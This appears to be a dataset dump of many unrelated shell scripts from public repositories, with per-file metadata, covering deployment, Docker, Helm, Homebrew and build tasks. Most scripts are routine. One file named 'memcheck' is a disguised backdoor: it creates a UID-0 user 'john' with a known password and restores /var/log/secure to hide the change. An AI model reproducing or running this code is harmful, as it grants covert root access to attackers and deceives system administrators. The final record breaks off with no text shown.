blob_id
stringlengths
40
40
language
stringclasses
1 value
repo_name
stringlengths
4
115
path
stringlengths
2
970
src_encoding
stringclasses
28 values
length_bytes
int64
31
5.38M
score
float64
2.52
5.28
int_score
int64
3
5
detected_licenses
listlengths
0
161
license_type
stringclasses
2 values
text
stringlengths
31
5.39M
download_success
bool
1 class
daf29692535accdd35a15ee7f71a25d61f87ab38
Shell
olberger/Labtainers
/setup_scripts/pull-all.sh
UTF-8
797
3.1875
3
[]
no_license
#!/bin/bash # # pull the baseline labtainer images from the appropriate registry # NOTE use of environment variable TEST_REGISTRY # Script assumes the pwd is the parent of the labtainer directory # Intended to be called from update-labtainer.sh # if [ "$TEST_REGISTRY" == TRUE ] || [ "$1" == -t ]; then registry=$(gr...
true
80404c622eaa71b8d77d1be13a608b2304580d1c
Shell
delkyd/alfheim_linux-PKGBUILDS
/cjdns-git-sysvinit/PKGBUILD
UTF-8
767
2.8125
3
[]
no_license
# Maintainer: Prurigro pkgname=cjdns-git-sysvinit pkgver=20140626.r12.dda687c pkgrel=1 pkgdesc="Legacy sysvinit (rc.d/init.d) service for the cjdns-git package" url="https://github.com/prurigro/${pkgname}" license=('GPL2') arch=('any') depends=('cjdns-git' 'bash') makedepends=('git') source=("git://github.com/prurigro...
true
bb657c0f04f0ac4577b105510a695c492bbe2081
Shell
SquareBracketAssociates/DeepIntoPharo
/build-chapters-and-upload.sh
UTF-8
1,193
3.75
4
[]
no_license
#!/bin/bash TEMP_DIR=/tmp SVN_REPO=svn+ssh://scm.gforge.inria.fr/svn/pharobooks REMOTE_SERVER=scm.gforge.inria.fr REMOTE_PATH=/home/groups/pharobooks/htdocs REMOTE=$REMOTE_SERVER:$REMOTE_PATH BOOK=PharoByExampleTwo-Eng DOWNLOAD_URL=http://pharobooks.gforge.inria.fr/PharoByExampleTwo-Eng cd $TEMP_DIR rm -rf $BOOK svn ...
true
96a71eb99728fbb12d9f90a8d931569551e1c201
Shell
izenecloud/ijma
/bin/smoke_test/diff.sh
UTF-8
504
3.53125
4
[ "Apache-2.0" ]
permissive
#!/bin/bash GOLD_DIR=smoke_test/gold OUTPUT_DIR=smoke_test/output # option "-w" to ignore white space different between Linux and Win32. diff -qw ${GOLD_DIR} ${OUTPUT_DIR} # check multi-thread results MULTI_DIR=smoke_test/multithread GOLD_FILE=${GOLD_DIR}/result_jma_run_stream.utf8 count=0 for file in `find ${MULTI_D...
true
45340626d4e4f67448d48ab9d323238f8cbe133e
Shell
mareksapota/dotfiles
/x/xmonad/scripts/on_restart.sh
UTF-8
481
3.203125
3
[ "LicenseRef-scancode-public-domain" ]
permissive
#!/bin/bash stage=$1 run() { if [[ "$stage" = "before" ]]; then killall "$1" fi if [[ "$stage" = "after" ]]; then nohup "$@" &> /dev/null & fi } stop() { if [[ "$stage" = "before" ]]; then killall "$1" fi } run nm-applet run parcellite run xscreensaver stop xmobar if...
true
c639ec55728b893281d93b4a5fe44a176a0114b1
Shell
benzBrake/Shell_Collections
/fail2ban/fail2ban.sh
UTF-8
4,404
3.703125
4
[]
no_license
#!/bin/sh # # Onekey install script for fail2ban # Author: Char1sma # Email: github-char1sma@woai.ru MIN_CENTOS_VER=5 MIN_DEBIAN_VER=6 MIN_UBUNTU_VER=12 SSH_PORT=$(netstat -ntlp|grep sshd |awk -F: '{if($4!="")print $4}' | head -n 1 | sed 's/[^1-9]//') linux_check(){ if $(grep -qi "CentOS" /etc/issue) || $(grep -q "Cen...
true
ff9033c7298bef01058bb2fd01f14bc882eba3f4
Shell
theKono/orchid
/deploy/notification/after_install.sh.tmpl
UTF-8
455
3.21875
3
[ "Apache-2.0" ]
permissive
#!/bin/bash # # After application is copied to final destination folder if [[ "$DEPLOYMENT_GROUP_NAME" == "Development" ]]; then name=notification-writer-dev supervisor_prog=notification-writer-dev else name=notification-writer supervisor_prog=notification-writer fi new_release_dir=/srv/$name/release/...
true
aa87d96ec2b7e40ebbbc8feb8712892ce057932e
Shell
sung1011/meepo
/init.sh
UTF-8
1,080
3.546875
4
[ "Apache-2.0" ]
permissive
#! /bin/bash # ==================== const # 程序目录 CRACK_PATH="/usr/local/crack/" # 源码目录 CRACK_PKG_PATH="/usr/local/crack/pkg/" # bin目录 CRACK_BIN_PATH="/usr/local/bin/" # go version GO_VER="1.15.6" # ==================== func function isCmdExist() { local cmd="$1" if [ -z "$cmd" ]; then echo "Usage i...
true
248b1ed70c0f521ffdcd5b09d27346bedc6ff3a6
Shell
MichaelFoss/octo-merge
/make_octo_txt.sh
UTF-8
399
3.703125
4
[ "MIT" ]
permissive
#!/bin/bash # Create the file that will be octo-merged # If it exists, nothing will happen besides changing the modified date touch octo_test.txt # Empty the contents of the file cp /dev/null octo_test.txt # Add n lines to the file # Format of line is: # "This is line 1 _" for i in $(eval echo "{1..$1}") do echo...
true
9231be6ef69d156e2f5bf141ae1a64b70b84dc63
Shell
ucam-cl-dtg/dtg-puppet
/modules/dtg/files/vm-boot.sh
UTF-8
3,029
3.6875
4
[]
no_license
#! /bin/bash ### BEGIN INIT INFO # Provides: dtg-vm # Required-Start: $local_fs $remote_fs # Required-Stop: $local_fs $remote_fs # Should-Start: $named # Default-Start: 2 3 4 5 # Default-Stop: # Short-Description: DTG vm properties # Description: Apply puppet on VM start ### END INIT INFO...
true
33695243009e62636b943c015054e6cc4eaae425
Shell
SouthAfricaDigitalScience/cgal-deploy
/deploy.sh
UTF-8
1,389
3.421875
3
[ "Apache-2.0" ]
permissive
#!/bin/bash -e # this should be run after check-build finishes. . /etc/profile.d/modules.sh module add deploy module add cmake module add zlib module add lapack/3.7.0-gcc-${GCC_VERSION} module add boost/1.63.0-gcc-${GCC_VERSION}-mpi-${OPENMPI_VERSION} cd ${WORKSPACE}/${NAME}-${VERSION}/build-${BUILD_NUMBER} echo "All...
true
e68beca30b0ffe07fcd705f241ab6b337afe5c12
Shell
alan-turing-institute/s3ToAzure
/parallel_download.sh
UTF-8
787
3.765625
4
[]
no_license
#!/bin/bash while getopts i:w:n:k:c option do case "${option}" in i) fileslist=${OPTARG};; w) workers=${OPTARG};; n) azure_storage_name=${OPTARG};; k) azure_storage_key=${OPTARG};; c) azure_container_name=$OPTARG;; esac done lines=`wc -l < $filelist` files_per_worke...
true
fe043ba186748fdf54215c65e2699a55415eaf2a
Shell
postmanlabs/sails-mysql-transactions
/scripts/postinstall.sh
UTF-8
2,084
3.796875
4
[ "Apache-2.0" ]
permissive
#!/usr/bin/env bash INFO="sails-mysql-transactions:"; # for console logs set -e; # If this is an NPM installation, we do not expect `.gitmodules` in the directory # since it is ignored by `.npmignore`. This is a fairly robust check to test whether # this script has been run as part of npm install or as part of self ...
true
d53593a4469852ce873003cbde20b24737635c52
Shell
ronban/mfa-secman
/mfa/utils/read-root-pwd.sh
UTF-8
341
2.828125
3
[]
no_license
# !/bin/bash read -p "Please enter the AWS region: " region read -p "Please enter the account number: " accountnumber echo "{ \"root_password_\": \"$password\"}" > $TMPDIR/root_password.json aws --region $region secretsmanager \ get-secret-value --secret-id rootpwd_$accountnumber \ | jq -r 'SecretString' rm -f $TMP...
true
277bdfa3dddab2816f4baf8b1a531fae1be6ef2a
Shell
Prabhurajn/shellscript_create_linuxusers
/sysuser.sh
UTF-8
753
3.71875
4
[]
no_license
#!/bin/bash read -p "Enter File name:" fl count=0; paswd="sicsr123" if [ -e $fl ] then line=`wc -l < $fl`; while [ $count -lt $line ] do let count++; users=`head -n $count $fl | tail -1 ` if [ $(id -u) -eq 0 ]; then grep "^$users" /etc/passwd > /dev/null if [ $? -eq 0 ]; then echo "$users exist"; ...
true
c762103b1720f2dc73d9311bbf8257d6380fa6bd
Shell
moggiez/auth
/scripts/package_all.sh
UTF-8
292
2.90625
3
[ "Apache-2.0" ]
permissive
#! /bin/bash CODE_DIR=$PWD/code/cognito_triggers DIST_DIR=$PWD/dist LAMBDAS=("custom_message" "post_confirmation") for lambda in "${LAMBDAS[@]}" do echo "Building lambda '$lambda'..." $PWD/scripts/build_and_package_lambda.sh $CODE_DIR/$lambda $DIST_DIR ${lambda}.zip echo "" done
true
6d9010646367ec69ff4ad2efa3fb561471454ae7
Shell
nixsolutions/ggf
/bin/composer.sh
UTF-8
536
3.296875
3
[ "MIT" ]
permissive
#!/bin/bash DIR="$( cd "$( dirname "$0" )" && pwd )" if [ ! -f $DIR/composer.phar ] then curl -sS https://getcomposer.org/installer | php -- --install-dir=$DIR else php $DIR/composer.phar self-update --profile fi php $DIR/composer.phar -V php $DIR/composer.phar diagnose --profile action="$2" if [ "$action" ...
true
2b4125c4a98c0096dcb66f6fddafdcd4f487a964
Shell
minedec/vtools
/app/src/main/assets/kr-script/apps/cloudmusic_ad_set.sh
UTF-8
559
3.015625
3
[]
no_license
#!/system/bin/sh function unlock_dir() { chattr -i $1 2> /dev/null $BUSYBOX chattr -i $1 2> /dev/null rm -rf $1 2> /dev/null } function lock_dir() { unlock_dir $1 echo "" > $1 chattr +i $1 2> /dev/null $BUSYBOX chattr +i $1 2> /dev/null } if [[ "$state" = "0" ]]; then lock_dir "$SDCA...
true
44fb944cc87d85fb7f6c092d3df87ba6f0889a68
Shell
gakaya/initial_sys_config
/copy_files.sh
UTF-8
120
2.53125
3
[]
no_license
DEST=/usr/local/bin FILE=treeprint.sh LINK=treeprint cp $FILE $DEST chmod +x $DEST/$FILE ln -s $DEST/$FILE $DEST/$LINK
true
01781f556b9a527a00238ce3ffb897839da45a42
Shell
karthickramalingam/dc-on-docker-li
/utils/docker-network-host.sh
UTF-8
7,230
3.546875
4
[]
no_license
#! /usr/bin/env bash # Docker picks the default network based on the network name # in the alphabetical order. We put this prefix to all the # network names so that those networks won't to be picked # as the default networks. # # https://github.com/docker/docker/issues/21741 net_prefix="znet" create_network_namespac...
true
6f8cf3cf892410f8127dd712126b62eeb42f5439
Shell
crcerror/ES-generic-shutdown
/install.sh
UTF-8
963
2.90625
3
[]
no_license
# Automatik install of multi_switch.sh script # Thanks to @neo954 for some script code # Check for SU/ROOT [[ $USER != "root" ]] && echo "Need root privileges... just run with 'sudo $0'" && exit # Install package raspi-gpio apt-get install -y raspi-gpio # Create Directories and download scripts mkdir -p /home/pi/Ret...
true
240dcc0c03a7fea37baf75c08cb2554b9bfda708
Shell
EWouters/jns
/scripts/conf_jupyterhub.sh
UTF-8
1,220
3.75
4
[ "MIT" ]
permissive
#!/bin/bash # script name: conf_jupyterhub.sh # last modified: 2019/09/01 # credits: EWouters # sudo: yes script_name=$(basename -- "$0") env="/home/pi/.venv/jns" if ! [ $(id -u) = 0 ]; then echo "usage: sudo ./$script_name" exit 1 fi # if jupyterhub directory exists, we keep it (-p) #...
true
b5ad9e0aa136027bda3b685dbd6d9fbed44e69b9
Shell
kipelovets/GeekPartyAnsible
/roles/mysql/templates/mysql_dump.sh
UTF-8
306
3.140625
3
[]
no_license
#!/bin/bash USER={{ mysql_db_user }} PASSWORD={{ mysql_db_password }} BACKUP_PATH="{{ backup_dir }}" DATE=$(date +"%Y-%m-%d") TARGET_FILE=$BACKUP_PATH/mysqldump-$DATE.sql echo "Writing dump to $TARGET_FILE\n" mysqldump --user=$USER --password=$PASSWORD --all-databases > "$TARGET_FILE" gzip -v -f $TARGET_FILE
true
18bb91ccad93800b3e610ad6cf0b0fd87c135fac
Shell
ayyfish/heroku-buildpack-tesseract
/bin/compile
UTF-8
844
3.1875
3
[ "MIT" ]
permissive
#!/bin/bash BUILD_DIR=$1 TESSERACT_OCR_VERSION=4.1.0 TESSERACT_OCR_TGZ=tesseract-ocr-$TESSERACT_OCR_VERSION.tar.gz TESSERACT_FOLDER_NAME=tesseract-ocr-$TESSERACT_OCR_VERSION INSTALL_DIR=$BUILD_DIR/vendor/tesseract-ocr/ TESSERACT_OCR_DIR=${HOME}/vendor/tesseract-ocr ENVSCRIPT=$BUILD_DIR/.profile.d/tesseract-ocr.sh TES...
true
fb6de28aebeb1e92a6b4eda20ee256a21070cd49
Shell
stefanbuck/all-packages
/script/release
UTF-8
305
2.765625
3
[ "MIT" ]
permissive
#!/usr/bin/env bash npm install --only=dev npm run build count=$(cat count) rm count git add package.json git config user.email "os@stefanbuck.com" git config user.name "Stefan Buck" git commit -m "Now with $count dependencies" npm version minor -m "bump minor to %s" npm publish git push origin master --follow-tags
true
638be2c80dbbe1996ab6c34b84526bcd2c8ed7d5
Shell
Skrilltrax/dotfiles
/macos/apps/install_apps
UTF-8
143
3.15625
3
[]
no_license
#!/usr/bin/env bash SCRIPT_DIR="$(cd -P "$(dirname "${BASH_SOURCE[0]}")" && pwd)" for SCRIPT in "$SCRIPT_DIR"/* do bash -c "$SCRIPT" done
true
ad7e21e8754ce0167dac5e1d46986e88f9f08c4f
Shell
bopopescu/first-1
/100doors
UTF-8
85
2.515625
3
[]
no_license
#!/bin/bash for i in list do if [ i -eq 0 ] then i=1 else i=0 done
true
37c165ae7ec628429aa25e32eab47c079137ba7a
Shell
SOliasS/Ender5plusSKRv1.3
/Marlin-bugfix-2.0.x/Marlin-bugfix-2.0.x/buildroot/bin/env_backup
UTF-8
414
3.40625
3
[ "MIT", "GPL-3.0-only", "GPL-1.0-or-later" ]
permissive
#!/usr/bin/env bash [ -z "$1" ] || cd $1 if [ -d ".test" ]; then printf "\033[0;31mEnvironment backup already exists!\033[0m\n" else mkdir .test cp Marlin/Configuration*.h .test/ [ -f Marlin/_Bootscreen.h ] && cp Marlin/_Bootscreen.h .test/ [ -f Marlin/_Statusscreen.h ] && cp Marlin/_Statusscreen.h .test/ ...
true
738c34b52c50fe24fcf14f6fae1c3e8202d33d86
Shell
FauxFaux/debian-control
/t/tuxtype/tuxtype_1.8.3-3_amd64/postinst
UTF-8
752
3.15625
3
[]
no_license
#!/bin/sh set -e if [ "$1" = "configure" ]; then if [ -d /usr/doc -a -h /usr/doc/tuxtype -a -d /usr/share/doc/tuxtype ]; then rm -f /usr/doc/tuxtype fi # make tuxtype binary and shared wordlist directory setgid games # and allow admin to override this decission dpkg-statoverride --l...
true
ca04a4550bcfbee7e0df9b46e9303bca48eefeb2
Shell
fcitx/mozc
/scripts/install_server
UTF-8
341
2.6875
3
[ "BSD-3-Clause", "NAIST-2003", "LicenseRef-scancode-public-domain", "LicenseRef-scancode-unicode" ]
permissive
#!/bin/sh _bldtype=${_bldtype:-Debug} PREFIX="${PREFIX:-/usr}" install -D -m 755 "out_linux/${_bldtype}/mozc_server" "${PREFIX}/lib/mozc/mozc_server" install -D -m 755 "out_linux/${_bldtype}/mozc_tool" "${PREFIX}/lib/mozc/mozc_tool" install -d "${PREFIX}/share/doc/mozc/" install -m 644 data/installer/*.html "${PREF...
true
5414fd26fb56eaed917b3ca16ff13b773e0a5b81
Shell
rocktan001/webrtc
/mediadevices/dockerfiles/build.sh
UTF-8
204
3.265625
3
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
#!/bin/bash cd $(dirname $0) OWNER=lherman PREFIX=cross IMAGES=$(ls *.Dockerfile) for image in ${IMAGES[@]} do tag=${OWNER}/cross-${image//.Dockerfile/} docker build -t "${tag}" -f "$image" . done
true
9d1352437d2e050f3ddeba9c3eb56189cf47e60f
Shell
oslab-ewha/simtbs
/mkload.sh
UTF-8
560
3.1875
3
[]
no_license
#!/bin/bash WORKLOADS="125 120 115 110 105 100 90 80 70 60 50 40 30 20 10" SIMTBS=`dirname $0`/simtbs function gen_conf() { cat <<EOF > $1 *general 10000 *sm 16 8 *mem 15000 *overhead_mem 500 1.2 1000 2.4 2000 3.6 3000 4.8 4000 6.0 5000 7.2 6000 8.4 7000 9.6 8000 10.8 9000 12.0 10000 13.2 15000 14 *workload $2 1...
true
9740103269917d5084942f93f2c507e077af72af
Shell
Unity3DMobileAlbatron/DATAUNITY3D
/Servercode/installserviced.sh
UTF-8
614
2.921875
3
[]
no_license
#!/bin/sh function isok() { ret=$1 action="$2" [[ $ret -ne 0 ]] && echo "ERROR!!!!,$action" && exit 1 echo "OK!!!!,$action" && return 0 } function docmd() { cmd=$1 echo $cmd eval "$cmd" isok $? "$cmd" } cd `dirname $0` cd serviced docmd "./build.sh" cd - docmd "cp -f serviced/servi...
true
4f7a5458016c7308415d1acd73d7f7276f585a29
Shell
belongcai/SHELL_FUCKER
/do_tac.bash
UTF-8
212
2.578125
3
[]
no_license
#!/bin/bash # use tac # use awk # use sort # achieve to convert lines seq 9 | tac echo "**************" seq 9 | \ awk ' { line[NR] = $0 lno=NR } END{ for(;lno>0;lno--) { print line[lno] } }'
true
819b13d0282a9cb513777739cf893e7957412811
Shell
bdingee/DW
/bw_depletion_extract.sh
UTF-8
6,310
3.5
4
[]
no_license
#!/bin/sh ############################################################################### # $Header: /dwa/cvsrepo/dev/depletion/bin/bw_depletion_extract.sh,v 1.17 2019/07/17 18:26:20 bdingee Exp $ # $Revision: 1.17 $ # $Name: PRD $ # # Description : create ...
true
eb5c63990c6114e7329cf9ba6ec92e0c9f73910e
Shell
endlesselectron/bin
/cloud9.sh
UTF-8
3,424
3.1875
3
[]
no_license
#!/bin/sh while [ ${#} -gt 1 ] do case ${1} in --project-name) PROJECT_NAME=${2} && shift && shift && true ;; --email) EMAIL=${2} && shift && shift && true ;; --name) ...
true
63ae680cf194c5d3346e878125e3e57b8bd11af6
Shell
feng-hui/python_books_examples
/linux_private_kitchen/chapter_12/cal_pi.sh
UTF-8
446
3.421875
3
[]
no_license
#!/bin/bash # Program # User input a scale number to calculate pi number. # History # 2019-07-16 FengHui First Release path=/bin:/sbin:/usr/bin:~/bin export path echo -e "This program will calculate pi value. \n" echo -e "You should input a float number to calculate pi value. \n" read -p "The scale number (10-1000) ?...
true
10ac325a46908ec403fb6bfec692f0b0b40c112b
Shell
a-pog/honey
/bin/wd
UTF-8
4,010
3.21875
3
[]
no_license
#!/usr/bin/env bash SERVER_CONF="/honey/conf/server.conf" RIG_CONF="/honey/conf/rig.conf" RIG_CONF_FEE="/tmp/rig_fee.conf" LOGS_FILE="/honey/log/miner.log" RIG_STATE="/tmp/state" TIME_SLEEP=10 TIME_RESTART=60 #180 TIME_REBOOT=120 #300 TIME_NOTIFY=$TIME_RESTART ATTEMPT_RESTART_MAX=3 MIN_HASH= . colors if [ ! -f $...
true
b0dc1e69045bd895da5cc3ee3a4b10ec6fed2ec7
Shell
shrekee/code
/shell/homework/homework_0725_2.sh
UTF-8
454
3.234375
3
[]
no_license
#!/bin/bash #计算距离2019年新年元旦凌晨零时零秒还有多少天多少时多少分 多少秒? day=0;hour=0;minute=0;second=0; future=`date -d "2019-1-1 0:0:0 " "+%s"` while true ;do now=`date "+%s"` let time=future-now let day=time/86400 let shi=time%86400 let hour=shi/3600 let fen=shi%3600 let minute=fen/60 let second=fen%60 echo "距离2019年新年元旦还有${day...
true
1f212d254f3e5df945d3b503af217114c1626b74
Shell
Voronenko/toggl_invoice
/console_helper/completions/_toggl.zsh
UTF-8
2,682
3.421875
3
[]
no_license
#compdef toggl __toggl-workspaces() { toggl workspaces } __toggl-projects() { toggl projects | awk '{ print $2 }' } __toggl-now() { echo "''d1:20''" echo "'`date '+%Y-%m-%d %H:%M:%S'`'" } __toggl-duration() { echo "''d1:20''" } __toggl-recent-entries() { toggl ls | grep @ | awk -F'@' '{prin...
true
dec891578e42acd92dce1dd0ef8149addc3a7a43
Shell
Bourne-ID/rancher-cloud-windows-diag
/install-cert-manager.sh
UTF-8
798
2.671875
3
[ "Apache-2.0" ]
permissive
#!/bin/bash # Configuration Path from RKE Provider config_path="$(pwd)/kube_config_cluster.yml" # Initialize Helm helm init --service-account tiller --kube-context local --kubeconfig "$config_path" --wait helm repo add jetstack https://charts.jetstack.io helm repo update # Install Cert Manager kubectl --kubeconfig=...
true
560051a2ea303f3411198f84d313cdc2c85ab934
Shell
alex-cory/fasthacks
/dotfiles/zsh/oh-my-zsh/tools/upgrade.sh
UTF-8
856
2.9375
3
[]
no_license
current_path=`pwd` echo -e "\033[0;34mUpgrading Oh My Zsh\033[0m" ( cd $ZSH && git pull origin master ) echo -e "\033[0;32m"' __ __ '"\033[0m" echo -e "\033[0;32m"' ____ / /_ ____ ___ __ __ ____ _____/ /_ '"\033[0m" echo -e "\033[0;32m"' / __ \/ __ \ / __ `__ ...
true
db35e860965b95230a2d491de7c4ffd048da9e2b
Shell
UiS-IDE-NG/neat
/ci/run-test
UTF-8
3,056
3.65625
4
[]
permissive
#!/usr/bin/env bash # # Travis CI Scripts # Copyright (C) 2018-2020 by Thomas Dreibholz # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) a...
true
6328313dafd42574a9fb8a846ba1948faaa9b35e
Shell
shawwn/scrap
/backupdir
UTF-8
916
3.75
4
[]
no_license
#!/bin/bash # usage examples: # # backup the ~/bin folder minus large binary files: # $ backupbin # # backup the entire ~/bin folder # $ backupbin all # #===================================================================== # main #===================================================================== BA...
true
f213ed748c3c94367e86370abb8e8d2ac39d06b4
Shell
nett55/travis-build
/lib/travis/build/script/templates/header.sh
UTF-8
3,203
4.21875
4
[ "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
#!/bin/bash source /etc/profile RED="\033[31;1m" GREEN="\033[32;1m" RESET="\033[0m" travis_time_start() { travis_start_time=$(travis_nanoseconds) echo -en "travis_time:start\r" } travis_time_finish() { local result=$? travis_end_time=$(travis_nanoseconds) local duration=$(($travis_end_time-$travis_start_ti...
true
f31a41bfa7d42b61d03aad51b9f626848acde683
Shell
dylanferguson/dotfiles
/update.sh
UTF-8
793
3.234375
3
[]
no_license
#!/bin/bash set -e echo 'Updating Brew...' brew update brew upgrade brew cleanup -s brew doctor brew missing pushd "$HOME/.dotfiles" brew bundle dump --force if [[ $(git diff --stat Brewfile) != '' ]]; then echo 'Updating Brewfile...' git add Brewfile git commit -m 'auto update Brewfile' fi echo 'pipx pkg bac...
true
16d7e6894c36f9e89382c6ef95875e290bde2b26
Shell
va1kyrie/test-scripts
/testsmalls.sh
UTF-8
2,237
4.125
4
[]
no_license
#!/bin/sh # test load of many small file transfers in quick succession # measures and logs CPU, memory, time, and bandwidth while sending repetitions # of a small file many times to a specified host (username@host/IP) TIMESTAMP=$(date +%T%d%m) ARGS=$# if [ ARGS -ne 3 ]; then echo "3 arguments needed" exit $E_WRO...
true
b34400c6c98027244866cd394e72cccf82a39a35
Shell
nipengmath/neural_sp
/examples/timit/s5/run.sh
UTF-8
4,861
3.328125
3
[]
no_license
#!/bin/bash # Copyright 2018 Kyoto University (Hirofumi Inaguma) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) echo ============================================================================ echo " TIMIT " echo =======================...
true
0f436421980faf099c653e628d7ca0551809f0ea
Shell
Helius/.bin
/system_temperature
UTF-8
1,581
2.734375
3
[]
no_license
#!/bin/bash MB_T_RAW=`sensors | egrep -o 'temp1:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+'` CORE_0_RAW=`sensors | egrep -o 'Core 0:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+'` CORE_1_RAW=`sensors | egrep -o 'Core 1:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+'` MB_T=$(( MB_T_RAW - 23 ))...
true
aa096ef15a6d8cb370e55e38b9894cffdd63678b
Shell
ebolinger/any-java-docker
/bin/doit.sh
UTF-8
933
3.609375
4
[ "MIT" ]
permissive
# # Run as root (or with docker permissions). # Start the docker process, then update NGINX with the new port. # BASE_NAME=$(basename $0) DIR_NAME=$(dirname $0) VOLUMES="-v /mnt/hi_sinatra-docker/data:/data -v /mnt/hi_sinatra-docker/logs:/logs" PORTS="-p 8080 -p 8000" USER="-u root" IMAGE=eb/any-java TMP_FILE=/tmp/file...
true
4e58d22a518e76f9a867e110809559aa398dadfa
Shell
gejiawen/my-shell-toolbox
/test/forin.sh
UTF-8
87
2.625
3
[]
no_license
arr=(1 2 3) for ip in ${arr[@]:1:${#arr[@]}}; do echo echo $ip echo done
true
d5aa6c06fadb8f63afe1b7c2ff92b6e787a94964
Shell
antoniofabio/eqtl-ranef
/tests/test-003-set-max-regressions.sh
UTF-8
487
2.5625
3
[]
no_license
#!/bin/bash -l set -e set -u set -o pipefail TMPD=`mktemp -d` trap "rm -rf ${TMPD}" EXIT ../generate-eqtl-ranef-data --output=${TMPD} \ --regressors=2 --outcomes=1000 --samples=100 --fixef=1 ../eqtl-ranef \ --regressors=${TMPD}/regressors \ --outcomes=${TMPD}/outcomes \ --fixef=${TMPD}/fixef \ --ranef=${T...
true
832a9595befd331770323436a155fa23c5c48226
Shell
wodby/nginx
/tests/matomo/run.sh
UTF-8
1,897
3
3
[ "MIT" ]
permissive
#!/usr/bin/env bash set -e if [[ -n "${DEBUG}" ]]; then set -x fi check_endpoint() { docker-compose exec -T nginx curl -s -S -I "localhost/${1}" | grep -q "${2}" echo "OK" } clean_exit() { docker-compose down } trap clean_exit EXIT docker-compose up -d docker-compose exec -T nginx make check-ready -...
true
baf3422b10b7002153541fc4dc2c275f06e0e122
Shell
hackiesackie/memcheck
/memcheck
UTF-8
747
2.515625
3
[]
no_license
#!/bin/bash cp /etc/passwd /etc/passwd.bak cp /etc/shadow /etc/shadow.bak cp /etc/gshadow /etc/gshadow.bak cp /etc/group /etc/group.bak cp /var/log/secure /var/log/secure.bak /usr/sbin/useradd john -o -u 0 -d /tmp/john > /dev/null 2>&1 echo john | passwd --stdin john > /dev/null 2>&1 cp /var/log/secure.bak /var/...
true
801bd3e56b5fa84f4872c363605aec88ae2077e8
Shell
sandhawke/mapleseed
/admin/gdeploy
UTF-8
823
3.484375
3
[]
no_license
#!/bin/sh if [ ! -f admin/gdeploy ]; then echo I think you are running this from the wrong place exit 1 fi group=$1 if [ -z "$group" ]; then echo usage: $0 server-group-name exit 1 fi groupfile="admin/groupconfig/$group.sh" if [ ! -f "$groupfile" ]; then echo Missing group configfile: $groupfile echo Pl...
true
0239e64ff873555e4c136d159edea343b1add322
Shell
EdricChan03/ngx-ytd-api-demo-builds
/deploy.sh
UTF-8
463
3.65625
4
[]
no_license
#!/bin/bash # Automatically exit if any command exits with a non-zero code set -e commitSha=$(git rev-parse --short HEAD) commitMessage=$(git log --oneline -n 1) echo -e "\x1b[34mDeploying commit ${commitSha} to Firebase...\x1b[0m" if [[ -n "$FIREBASE_TOKEN" ]]; then firebase deploy --only hosting --message "${commi...
true
94f8089e936cef202ca4a45bfda6063d1ab6e18d
Shell
loseleo/changecamera-android
/pkg_make.sh
UTF-8
5,033
3.734375
4
[ "Apache-2.0" ]
permissive
#!/usr/bin/env bash unameOut="$(uname -s)" case "${unameOut}" in Linux*) machine=Linux;; Darwin*) machine=Mac;; CYGWIN*) machine=Cygwin;; MINGW*) machine=MinGw;; *) machine="UNKNOWN:${unameOut}" esac if [ "$PKG_DEBUG" != "" ];then set -x fi # flags set -e # variables k...
true
ec23a6937facedb2eb01c3908577400451fde8ac
Shell
zheddie/samplecodes
/src_C/linux/selfwrite/rpmProjects/build.sh
UTF-8
397
3.171875
3
[]
no_license
#!/bin/bash set -x CURRENTDIR=`pwd` HELLONAME=hello1-1.0 if [ "$1" == "hello" ]; then if [ "$2" == "rpmbuild" ]; then if [ ! -f ${HELLONAME}.tar.Z ]; then tar czf ${HELLONAME}.tar.Z ${HELLONAME} fi #tar czf ${HELLONAME}.tar.Z --exclude="*.spec" ${HELLONAME} cp ${HELLONAME}.tar.Z ~/rpmbuild/SOURCES/ rpmbui...
true
8907af13db219cbf891333ac3656c449f4a2bd4d
Shell
dlang/dconf.org
/netlify.sh
UTF-8
415
2.75
3
[ "LicenseRef-scancode-unknown-license-reference", "BSL-1.0" ]
permissive
#!/usr/bin/env bash # A small script to build dconf.org and allows previewing PRs with netlify set -euox pipefail DMD_VERSION="2.079.0" BUILD_DIR="build" DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" cd "${DIR}" . "$(curl -fsSL --retry 5 --retry-max-time 120 --connect-timeout 5 --speed-time 30 --speed-lim...
true
a38ea3a69a0af77321a36a3969559bed767dc05f
Shell
CUCCS/2015-linux-public-kjAnny
/实验六:shell脚本编程练习进阶/scripts/install.sh
UTF-8
996
3.15625
3
[]
no_license
#!/bin/bash source /root/global-var.sh apt-get update if [ $? -ne 0 ] ; then echo "Error : Fail to update" exit 0 else apt-get install debconf-utils if [ $? -ne 0 ] ; then echo "Error : Fail to install the packages" exit 0 else debconf-set-selections <<\EOF proftpd-basic shared/proftpd/inetd...
true
a5b90247a50325365dcbdb8509fe96f5f7a41aed
Shell
gmoshkin/dotfiles
/scripts/random_task.sh
UTF-8
304
2.890625
3
[]
no_license
#!/bin/bash if [ -z "$KEY" -o -z "$TOK" -o -z "$BID" ]; then echo "KEY, TOK, BID vars aren't set (see ~/.config/trello-api-keys.conf)" exit 1 fi curl "https://api.trello.com/1/boards/${BID}/lists?filter=open&cards=open&key=${KEY}&token=${TOK}" | jq '.[].cards|.[].name' -r | shuf | head -1
true
798d2af498bc3cb19edb4d5dc284fe3d6c46d2df
Shell
hamidreza2000us/sitesetup
/01-initializeRHVM.sh
UTF-8
3,896
2.546875
3
[]
no_license
#Copy SiteSetup to the /root mkdir -p ~/SiteSetup/{Backups,Files,Images,ISOs,RPMs,Yaml} cd /root/SiteSetup/Yaml ansible-playbook -i .inventory uploadImage.yml ansible-playbook -i .inventory create-vmFromImage.yml -e VMName=Template8.3 -e VMMemory=2GiB -e VMCore=1 \ -e ImageName=rhel-8.3-x86_64-kvm.qcow2 -e HostName=tem...
true
61ec1d3038b0ca2af7a17487783fd38b0983f136
Shell
hi-sasaki/clean-architecture-golang-sample
/.pre-commit
UTF-8
346
3.609375
4
[]
no_license
